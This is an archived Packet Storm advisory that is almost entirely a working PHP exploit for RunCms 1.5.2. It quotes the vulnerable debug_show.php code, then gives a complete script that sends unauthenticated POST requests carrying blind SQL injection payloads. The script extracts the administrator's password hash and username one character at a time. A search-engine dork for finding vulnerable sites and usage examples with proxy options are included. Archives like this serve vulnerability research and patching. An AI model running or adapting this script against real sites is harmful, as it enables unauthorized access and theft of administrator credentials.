runcms152-sql.txt

2007-05-08T00:00:00
ID PACKETSTORM:56498
Type packetstorm
Reporter rgod
Modified 2007-05-08T00:00:00

Description

                                        
                                            `<?php  
print_r('  
--------------------------------------------------------------------------  
RunCms <= 1.5.2 /class/debug/debug_show.php sql injection / credentials  
disclosure exploit  
by rgod  
mail: retrog at alice dot it  
site: http://retrogod.altervista.org  
  
dork: "Runcms Copyright" "2002 - 2007" +"page created"  
---------------------------------------------------------------------------  
');  
  
/*  
software site: http://www.runcms.org/modules/news/  
  
vulnerable code in /class/debug/debug_show.php:  
<?php  
...  
  
include_once("../../mainfile.php");  
include_once("../../header.php");  
  
switch($_POST['debug_show']) {  
case "show_files":  
show_files($_POST['loaded_files']);  
break;  
  
case "show_queries":  
show_queries($_POST['executed_queries'], $_POST['sorted']);  
break;  
}  
  
include_once("../../footer.php");  
?>  
  
no authentication is performed to run show_files() and show_queries()  
functions, look at this now in /class/debug/debug.php:  
  
...  
function show_queries($executed_queries, $sorted=0)  
{  
global $db;  
  
$executed_queries = unserialize(urldecode($executed_queries));  
  
if ($sorted == 1)  
{  
sort($executed_queries);  
$is_sorted = _DBG_SORTEDR;  
}  
else  
{  
array_reverse($executed_queries);  
$is_sorted = _DBG_NSORTEDR;  
}  
  
OpenTable();  
  
$fulldebug = "  
<h4>($is_sorted) "._DBG_QEXECED.": ".count($executed_queries)."</h4>  
<table width='100%' cellpadding='3' cellspacing='1'>";  
  
$size = count($executed_queries);  
  
for ($i=0; $i<$size; $i++)  
{  
$stime = get_micro_time();  
  
$query = $db->query("EXPLAIN ".$executed_queries[$i]."");  
$querytime = (get_micro_time() - $stime);  
$totaltime += $querytime;  
  
$fulldebug .= "<tr>  
<td nowrap='nowrap' class='bg2'><b>"._DBG_QUERY.": ".($i+1)."</b></td>  
<td colspan='7' class='bg3'>$executed_queries[$i]</td>  
</tr><tr>  
<td nowrap='nowrap' class='bg2'><b>"._DBG_TIME.":</b></td>  
<td colspan='7' class='bg3'>".round($querytime, 4)." "._DBG_SECONDS."</td>  
</tr><tr>  
<td nowrap='nowrap' class='bg2'><b>"._DBG_TABLE.":</b></td>  
<td nowrap='nowrap' class='bg2'><b>"._DBG_TYPE.":</b></td>  
<td nowrap='nowrap' class='bg2'><b>"._DBG_POSSKEYS.":</b></td>  
<td nowrap='nowrap' class='bg2'><b>"._DBG_KEY.":</b></td>  
<td nowrap='nowrap' class='bg2'><b>"._DBG_KEYLEN.":</b></td>  
<td nowrap='nowrap' class='bg2'><b>ref:</b></td>  
<td nowrap='nowrap' class='bg2'><b>"._DBG_ROWS.":</b></td>  
<td nowrap='nowrap' class='bg2'><b>"._DBG_EXTRA.":</b></td>  
</tr>";  
  
while ($result = $db->fetch_array($query))  
{  
$fulldebug .= " <tr>  
<td class='bg3' nowrap='nowrap' {$result['table']} </td>  
<td class='bg3' nowrap='nowrap' {$result['type']} </td>  
<td class='bg3'>{$result['possible_keys']} </td>  
<td class='bg3' nowrap='nowrap' {$result['key']} </td>  
<td class='bg3' nowrap='nowrap' {$result['key_len']} </td>  
<td class='bg3' nowrap='nowrap' {$result['ref']} </td>  
<td class='bg3' nowrap='nowrap' {$result['rows']} </td>  
<td class='bg3'>{$result['Extra']} </td>  
</tr>";  
}  
$fulldebug .= "<tr>  
<td colspan='8' class='bg1'>"._DBG_CUMULATED.":".round($totaltime, 4)." "._DBG_SECONDS."<hr noshade></td>  
</tr>";  
}  
  
$fulldebug .= "</table>";  
  
echo $fulldebug;  
CloseTable();  
}  
...  
  
we have a nice kind of sql injection here!  
  
also show_files function can be used to check the existence of certain files  
and retrieve the filesize or if it has been modified and so on...  
  
  
*/  
  
if ($argc<3) {  
print_r('  
---------------------------------------------------------------------------  
Usage: php '.$argv[0].' host path OPTIONS  
host: target server (ip/hostname)  
path: path to runcms  
  
Options:  
-p[port]: specify a port other than 80  
-P[ip:port]: "" a proxy  
-T[prefix] "" a table prefix (default: runcms)  
Example:  
php '.$argv[0].' localhost /runcms/ -P1.1.1.1:80  
php '.$argv[0].' localhost / -Trcms -p81  
---------------------------------------------------------------------------  
');  
die;  
}  
  
error_reporting(7);  
ini_set("max_execution_time",0);  
ini_set("default_socket_timeout",5);  
  
function quick_dump($string)  
{  
$result='';$exa='';$cont=0;  
for ($i=0; $i<=strlen($string)-1; $i++)  
{  
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))  
{$result.=" .";}  
else  
{$result.=" ".$string[$i];}  
if (strlen(dechex(ord($string[$i])))==2)  
{$exa.=" ".dechex(ord($string[$i]));}  
else  
{$exa.=" 0".dechex(ord($string[$i]));}  
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}  
}  
return $exa."\r\n".$result;  
}  
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';  
  
function send($packet)  
{  
global $proxy, $host, $port, $html, $proxy_regex;  
if ($proxy=='') {  
$ock=fsockopen(gethostbyname($host),$port);  
if (!$ock) {  
echo 'No response from '.$host.':'.$port; die;  
}  
}  
else {  
$c = preg_match($proxy_regex,$proxy);  
if (!$c) {  
echo 'Not a valid proxy...';die;  
}  
$parts=explode(':',$proxy);  
$parts[1]=(int)$parts[1];  
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";  
$ock=fsockopen($parts[0],$parts[1]);  
if (!$ock) {  
echo 'No response from proxy...';die;  
}  
}  
fputs($ock,$packet);  
if ($proxy=='') {  
$html='';  
while (!feof($ock)) {  
$html.=fgets($ock);  
}  
}  
else {  
$html='';  
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {  
$html.=fread($ock,1);  
}  
}  
fclose($ock);  
}  
  
$host=$argv[1];  
$path=$argv[2];  
$port=80;  
$proxy="";  
$prefix="runcms";  
  
for ($i=3; $i<$argc; $i++){  
$temp=$argv[$i][0].$argv[$i][1];  
if ($temp=="-p")  
{  
$port=(int)str_replace("-p","",$argv[$i]);  
}  
if ($temp=="-P")  
{  
$proxy=str_replace("-P","",$argv[$i]);  
}  
if ($temp=="-T")  
{  
$prefix=str_replace("-T","",$argv[$i]);  
}  
}  
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}  
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}  
  
$md5s[0]=0;//null  
$md5s=array_merge($md5s,range(48,57)); //numbers  
$md5s=array_merge($md5s,range(97,102));//a-f letters  
//print_r(array_values($md5s));  
echo "md5 hash -> ";  
$j=1;$password="";  
while (!strstr($password,chr(0))){  
for ($i=0; $i<=255; $i++){  
if (in_array($i,$md5s)){  
$executed_queries=array();  
//original query: EXPLAIN ...  
$executed_queries[0]="SELECT null FROM ".$prefix."_users WHERE 1=(IF((ASCII(SUBSTRING(pass,".$j.",1))=".$i."),1,999999)) AND rank=7 LIMIT 1";  
$sql=urlencode(serialize($executed_queries));  
$sql=str_replace("%22","%2522",$sql);//you know, urldecode()...  
$data ="debug_show=show_queries";  
$data.="&executed_queries=".$sql;  
$data.="&sorted=1";  
$packet ="POST ".$p."class/debug/debug_show.php HTTP/1.0\r\n";  
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";  
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";  
$packet.="Host: ".$host."\r\n";  
$packet.="Content-Length: ".strlen($data)."\r\n";  
$packet.="Pragma: no-cache\r\n";  
$packet.="Connection: Close\r\n\r\n";  
$packet.=$data;  
send($packet);  
if (eregi("_users </td>",$html)){$password.=chr($i);echo chr($i); sleep(1); break;}  
}  
if ($i==255) {die("Exploit failed...");}  
}  
$j++;  
}  
echo "\n";  
  
echo "admin username -> ";  
$j=1;$admin_user="";  
while (!strstr($admin_user,chr(0))){  
for ($i=0; $i<=255; $i++){  
$executed_queries=array();  
$executed_queries[0]="SELECT null FROM ".$prefix."_users WHERE 1=(IF((ASCII(SUBSTRING(uname,".$j.",1))=".$i."),1,999999)) AND rank=7 LIMIT 1";  
$sql=urlencode(serialize($executed_queries));  
$sql=str_replace("%22","%2522",$sql);  
$data ="debug_show=show_queries";  
$data.="&executed_queries=".$sql;  
$data.="&sorted=1";  
$packet ="POST ".$p."class/debug/debug_show.php HTTP/1.0\r\n";  
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";  
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";  
$packet.="Host: ".$host."\r\n";  
$packet.="Content-Length: ".strlen($data)."\r\n";  
$packet.="Pragma: no-cache\r\n";  
$packet.="Connection: Close\r\n\r\n";  
$packet.=$data;  
send($packet);  
if (eregi("_users </td>",$html)){$admin_user.=chr($i);echo chr($i); sleep(1); break;}  
}  
if ($i==255) {die("Exploit failed...");}  
$j++;  
}  
?>  
  
  
original url: http://retrogod.altervista.org/runcms_152_sql.html  
`